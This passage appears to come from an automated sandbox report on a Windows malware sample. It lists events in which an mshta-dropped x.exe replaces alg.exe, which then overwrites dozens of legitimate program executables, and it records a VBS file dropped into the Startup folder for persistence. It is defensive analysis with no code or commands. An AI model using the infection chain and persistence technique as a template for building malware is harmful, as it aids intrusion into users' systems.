                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\subpredicate\differences.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbsJump to behavior
